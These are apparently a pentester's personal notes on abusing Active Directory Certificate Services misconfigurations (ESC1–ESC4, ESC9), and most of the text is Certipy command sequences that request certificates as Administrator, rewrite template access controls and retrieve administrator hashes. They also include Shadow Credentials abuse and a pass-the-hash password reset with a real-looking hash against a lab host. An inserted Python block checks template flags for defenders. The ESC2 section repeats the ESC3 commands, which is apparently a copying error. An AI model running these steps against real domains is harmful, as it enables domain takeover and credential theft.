M4RCG04M

Active Directory Certificate Services (AD CS)

https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-certificate-services/#esc2-misconfigured-certificate-templates

If ports 3268 and 3269 (Global Catalog LDAP) are open, AD CS certificate templates should be checked.

Find Vulnerable Certificates

certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -vulnerable -stdout
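As an added example (not part of the original notes and not Certipy's own code), the following Python reproduces the template conditions behind the ESC1, ESC2 and ESC3 findings from the attributes stored on a certificate template object, so that a defender can verify what a certipy find -vulnerable run reports. The bit values are the documented msPKI-* flag bits; the dictionary keys and the template data are constructed sample input.

```python
# Added example, not from the original page: evaluate the ESC1/ESC2/ESC3
# conditions that "certipy find -vulnerable" reports, from template attributes
# as stored in LDAP. All template data here is constructed sample input.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag: requester picks subject/SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: manager approval required

EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",       # Client Authentication
             "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
             "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
             EKU_ANY_PURPOSE}
# Authenticated Users, Everyone, and the Domain Users / Domain Computers RIDs.
LOW_PRIV_SIDS = {"S-1-5-11", "S-1-1-0"}
LOW_PRIV_RIDS = {"513", "515"}

def is_low_priv(sid):
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS

def classify(t):
    """Return the set of ESC findings ('ESC1', 'ESC2', 'ESC3') for a template dict."""
    # Preconditions shared by ESC1-3: enabled, a low-privileged principal can
    # enroll, no manager approval, and no authorized signatures required.
    if not t["enabled"] or not any(is_low_priv(s) for s in t["enroll_sids"]):
        return set()
    if t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS or t["ra_signature"] > 0:
        return set()
    ekus = set(t["ekus"])
    unrestricted = EKU_ANY_PURPOSE in ekus or not ekus  # no EKU = usable for any purpose
    findings = set()
    if t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and (ekus & AUTH_EKUS or unrestricted):
        findings.add("ESC1")  # requester-chosen UPN in an authentication certificate
    if unrestricted:
        findings.add("ESC2")
    if EKU_CERT_REQUEST_AGENT in ekus:
        findings.add("ESC3")  # enrollment agent may request on behalf of others
    return findings

# Constructed sample templates: ESC1-style, enrollment agent, and a safe one
# where manager approval blocks the misuse.
ESC1_TEMPLATE = {"name": "CustomUser", "enabled": True, "name_flag": 0x1,
                 "enrollment_flag": 0x0, "ra_signature": 0,
                 "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll_sids": ["S-1-5-21-1-2-3-513"]}
AGENT_TEMPLATE = {"name": "Agent", "enabled": True, "name_flag": 0x0,
                  "enrollment_flag": 0x0, "ra_signature": 0,
                  "ekus": [EKU_CERT_REQUEST_AGENT], "enroll_sids": ["S-1-5-11"]}
SAFE_TEMPLATE = dict(ESC1_TEMPLATE, name="Approved", enrollment_flag=0x2)
```

Feeding a template's real msPKI-* values and enrollment ACE SIDs into classify gives the same ESC1/ESC2/ESC3 verdict as the tool, which makes it easy to confirm that a remediation (manager approval, removing Enrollee Supplies Subject, or removing the broad enroll right) actually clears the finding.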

ESC1: Misconfigured Certificate Templates

certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN> -dns <RHOST>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>

ESC2: Misconfigured Certificate Templates

certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>

ESC3: Enrollment Agent Templates

certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE>
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx
certipy auth -pfx administrator.pfx -dc-ip <RHOST>

ESC4: Vulnerable Certificate Template Access Control

First, overwrite the template configuration so that it becomes vulnerable to ESC1 (-save-old keeps a copy of the original configuration):

certipy-ad template -dc-ip <ip> -u <user> -p <pass> -template <templateName> -target <ip> -save-old

Then, request a certificate based on the ESC4 template, just like ESC1.

certipy-ad req -username <user> -password <pass> -ca <ca_name> -template <templateName> -upn Administrator@<domain> -target-ip <ip> -dns <dns_dc>

Finally, authenticate with the certificate to get the hash:

certipy-ad auth -pfx administrator_dc01.pfx -dc-ip <ip>

ESC9

If user1 has GenericWrite over user2, we can obtain user2's hash with Shadow Credentials, since user1's GenericWrite allows writing msDS-KeyCredentialLink:

certipy shadow auto -username <user1>@<domain> -p <pass1> -account <user2>

We can also change the password of that user:

pth-net rpc password "ca_operator" "Password123" -U "certified.htb"/"management_svc"%"ffffffffffffffffffffffffffffffff":"a091c1832bcdd4677c28b5a6a1295584" -S "10.10.11.41" 

In this step, we change user2's userPrincipalName to Administrator:

certipy account update -username <user1>@<domain> -password <pass1> -user <user2> -upn Administrator

We request a certificate from the vulnerable ESC9 template as user2:

certipy req -username <user2>@<domain> -hashes <user2 hash> -ca <ca_name> -template <vulnerableESC9 template name>

And finally we get the hash of administrator:

certipy auth -pfx administrator.pfx -domain corp.local
